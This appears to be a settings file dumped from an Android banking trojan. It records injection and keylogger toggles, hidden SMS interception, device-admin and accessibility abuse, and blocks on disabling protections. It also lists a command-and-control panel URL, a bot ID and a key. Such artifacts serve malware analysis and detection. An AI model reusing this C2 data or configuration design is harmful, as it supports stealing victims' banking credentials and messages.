<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="timeCC">-1</string>
    <string name="old_start_inj">0</string>
    <string name="arrayInjection"></string>
    <string name="actionSettingInection"></string>
    <string name="statBanks">0</string>
    <string name="sms_sdk_Q">com.bth.goqcsies.lzctdazz.bhqkdytxpwq</string>
    <string name="checkupdateInjection"></string>
    <string name="starterService"></string>
    <string name="statProtect">0</string>
    <string name="logsSavedSMS"></string>
    <string name="logsApplications"></string>
    <string name="start_admin">1</string>
    <string name="getPermissionsToSMS"></string>
    <string name="packageNameActivityInject">com.bth.goqcsies.lzctdazz.jewzlwpwttirjtr</string>
    <string name="lockDevice">0</string>
    <string name="activityAccessibilityVisible">1</string>
    <string name="startInstalledTeamViewer">1</string>
    <string name="whileStartUpdateInection"></string>
    <string name="hiddenSMS">1</string>
    <string name="schetAdmin">0</string>
    <string name="urlAdminPanel">https://yillardirsensinyanimda.com</string>
    <string name="idbot">6prw89xd43fx6u53r</string>
    <string name="statCards">0</string>
    <string name="timeProtect">-1</string>
    <string name="inj_start">0</string>
    <string name="app_inject"></string>
    <string name="display_width">1440</string>
    <string name="logsContacts"></string>
    <string name="checkProtect">2</string>
    <string name="offSound">0</string>
    <string name="urls"></string>
    <string name="activeInjection">0</string>
    <string name="statDownloadModule">0</string>
    <string name="getIdentifier">2130968576</string>
    <string name="statusInstall"></string>
    <string name="schetBootReceiver">42</string>
    <string name="initialization">good</string>
    <string name="packageName">com.bth.goqcsies</string>
    <string name="key">xhawjEzbgG23j</string>
    <string name="startpush"></string>
    <string name="timeInject">-1</string>
    <string name="killApplication"></string>
    <string name="dataKeylogger">1</string>
    <string name="timeMails">-1</string>
    <string name="LogSMS">BLOCK DISABLE ACCESIBILITY SERVICE::endLog::BLOCK DISABLE ADMIN::endLog::</string>
    <string name="idSettings"></string>
    <string name="kill"></string>
    <string name="statAdmin">0</string>
    <string name="autoClick">1</string>
    <string name="timestop">0</string>
    <string name="keylogger"></string>
    <string name="activeDevice">0</string>
    <string name="statMails">0</string>
    <string name="display_height">2872</string>
    <string name="step">0</string>
    <string name="day1PermissionSMS">1</string>
    <string name="statAccessibilty">1</string>
    <string name="listSaveLogsInjection"></string>
    <string name="goOffProtect"></string>
    <string name="timeWorking">768</string>
    <string name="nameInject"></string>
</map>
